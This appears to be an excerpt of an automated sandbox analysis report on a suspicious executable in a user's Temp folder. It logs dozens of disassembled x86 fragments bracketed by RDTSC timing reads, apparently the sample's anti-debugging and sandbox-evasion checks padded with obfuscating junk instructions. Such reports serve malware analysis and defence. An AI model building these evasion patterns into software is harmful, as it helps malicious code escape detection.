Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 62E76A second address: 62E7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007FF698E1E1AAh 0x0000000f nop 0x00000010 jmp 00007FF698E1E1ADh 0x00000015 push 00000000h 0x00000017 clc 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FF698E1E1A8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov dword ptr [ebp+12468B8Ah], esi 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 pop edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 62E7C0 second address: 62E801 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF698BF10C8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jno 00007FF698BF10D9h 0x00000014 pushad 0x00000015 jmp 00007FF698BF10D7h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 628648 second address: 628660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 628660 second address: 6286D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push dword ptr fs:[00000000h] 0x00000014 stc 0x00000015 sub bh, FFFFFF88h 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f mov ebx, dword ptr [ebp+122D28FBh] 0x00000025 mov eax, dword ptr [ebp+122D0115h] 0x0000002b mov edi, dword ptr [ebp+122D2F6Fh] 0x00000031 push FFFFFFFFh 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FF698BF10C8h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d movzx edi, dx 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jc 00007FF698BF10DCh 0x00000059 jmp 00007FF698BF10D6h 0x0000005e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 633F7D second address: 633F87 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 633F87 second address: 633FAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jl 00007FF698BF10C6h 0x00000013 jmp 00007FF698BF10CBh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 633FAF second address: 633FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 62973D second address: 629752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698BF10D1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 62A860 second address: 62A869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 63D0DF second address: 63D0F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698BF10D3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 63D0F7 second address: 63D0FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 63D0FE second address: 63D123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push esi 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 pop esi 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF698BF10D0h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 63D123 second address: 63D141 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e jbe 00007FF698E1E1ACh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 63D2ED second address: 63D300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FF698BF10CCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 63D300 second address: 63D304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 642D42 second address: 642D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698BF10D7h 0x00000009 jng 00007FF698BF10C6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FF698BF10C6h 0x00000018 jmp 00007FF698BF10D0h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 642D7C second address: 642D82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 642292 second address: 6422AE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF698BF10DEh 0x00000008 jmp 00007FF698BF10D2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 642716 second address: 64274E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF698E1E1BFh 0x00000008 pushad 0x00000009 jmp 00007FF698E1E1B4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6428CA second address: 6428FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF698BF10C6h 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop esi 0x0000000f pushad 0x00000010 jbe 00007FF698BF10C6h 0x00000016 jmp 00007FF698BF10D9h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 646088 second address: 64608C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 64B4D5 second address: 64B4D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61CA7C second address: 61CA91 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007FF698E1E1B4h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61CA91 second address: 61CACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF698BF10C6h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FF698BF10C8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 lea eax, dword ptr [ebp+124917D2h] 0x0000002c mov edx, dword ptr [ebp+122D296Bh] 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 pop eax 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61CACF second address: 61CAE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61CAE9 second address: 61CAED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61CAED second address: 5FA3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D1E97h], edi 0x00000010 call dword ptr [ebp+122D1FA5h] 0x00000016 push ebx 0x00000017 push esi 0x00000018 jmp 00007FF698E1E1ABh 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61CCC3 second address: 61CCCD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF698BF10C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61CCCD second address: 61CCD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61CCD3 second address: 61CCE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61CF57 second address: 61CF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF698E1E1B3h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61D071 second address: 61D080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61D1C3 second address: 61D1E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jne 00007FF698E1E1A6h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61D1E1 second address: 61D1FD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF698BF10CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61D1FD second address: 61D202 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61D202 second address: 61D225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF698BF10C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f je 00007FF698BF10CAh 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61D2CB second address: 61D2D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61D2D0 second address: 61D2D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61D321 second address: 61D326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61DAD0 second address: 61DAF9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF698BF10C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FF698BF10D9h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61DF67 second address: 61DF6C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61DF6C second address: 5FAF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a movzx edi, si 0x0000000d call dword ptr [ebp+122D259Dh] 0x00000013 pushad 0x00000014 push ecx 0x00000015 jl 00007FF698BF10C6h 0x0000001b jp 00007FF698BF10C6h 0x00000021 pop ecx 0x00000022 push esi 0x00000023 jnl 00007FF698BF10C6h 0x00000029 pop esi 0x0000002a push esi 0x0000002b jmp 00007FF698BF10CDh 0x00000030 pop esi 0x00000031 push esi 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5C882A second address: 5C8830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 64A666 second address: 64A682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF698BF10D8h 0x0000000a jmp 00007FF698BF10D0h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5FA3D4 second address: 5FA3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF698E1E1A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007FF698E1E1A6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5FA3E9 second address: 5FA3EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 64A952 second address: 64A95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FF698E1E1A6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 64A95C second address: 64A977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 64A977 second address: 64A996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698E1E1B9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 64AC08 second address: 64AC0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 64B062 second address: 64B06D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FF698E1E1A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 652879 second address: 652887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 652887 second address: 6528BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 jmp 00007FF698E1E1B2h 0x0000000d jnc 00007FF698E1E1A6h 0x00000013 pop ebx 0x00000014 jbe 00007FF698E1E1B7h 0x0000001a jmp 00007FF698E1E1B1h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6528BF second address: 6528CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698BF10CBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 652A52 second address: 652A77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B9h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 652FEF second address: 65300A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FF698BF10D6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 65300A second address: 653022 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF698E1E1A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FF698E1E1A6h 0x00000010 jnp 00007FF698E1E1A6h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 653022 second address: 653026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 653326 second address: 653334 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6534BA second address: 6534D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF698BF10CFh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6534D2 second address: 6534D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6534D8 second address: 6534E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jp 00007FF698BF10C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 65391F second address: 653943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF698E1E1A6h 0x0000000a pushad 0x0000000b jmp 00007FF698E1E1B7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 653943 second address: 653949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 657FBD second address: 657FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF698E1E1B6h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 657FDA second address: 657FF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6583D3 second address: 6583D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 658546 second address: 65854C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 658C8F second address: 658C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 658C93 second address: 658CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FF698BF10D2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 65D002 second address: 65D021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FF698E1E1B8h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 65D2A0 second address: 65D2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 65D2A4 second address: 65D2B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 65D2B4 second address: 65D2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 65D2B8 second address: 65D2BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 65F8AD second address: 65F8CC instructions: 0x00000000 rdtsc 0x00000002 js 00007FF698BF10C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF698BF10CFh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 65F8CC second address: 65F8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 66666F second address: 666679 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF698BF10CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 664F0D second address: 664F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 664F11 second address: 664F15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
